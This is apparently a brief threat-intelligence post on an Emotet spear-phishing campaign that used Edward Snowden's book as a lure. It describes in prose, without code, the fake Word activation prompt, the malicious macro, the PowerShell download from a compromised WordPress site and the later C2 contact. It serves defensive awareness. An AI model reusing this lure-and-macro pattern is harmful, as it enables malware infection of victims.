Emotet recently resumed spear phishing attacks, incorporating the news about NSA whistleblower Edward Snowden’s new book Permanent Record as a lure. The memoir is already on Amazon’s bestseller list. Criminals tend to generate monetary benefits from such newsworthy events for scams and other social engineering purposes. In this particular case, Emotet authors are supposedly offering Snowden’s memoir as a Word attachment. Emails of this phishing campaign were found in English, Italian, Spanish, German and French, as shown below.
When the document is opened, a fake message appears that “Word hasn’t been activated”. When victims click on “Enable Content” appearing with a security warning, a malicious macro code is executed.
The macro triggers a PowerShell command that will retrieve the Emotet malware binary from a compromised WordPress site. After infection, the machine will attempt to reach out to one of Emotet’s many C2s.
IP(s) / Hostname(s)
Malware Hash (MD5/SHA1/SH256)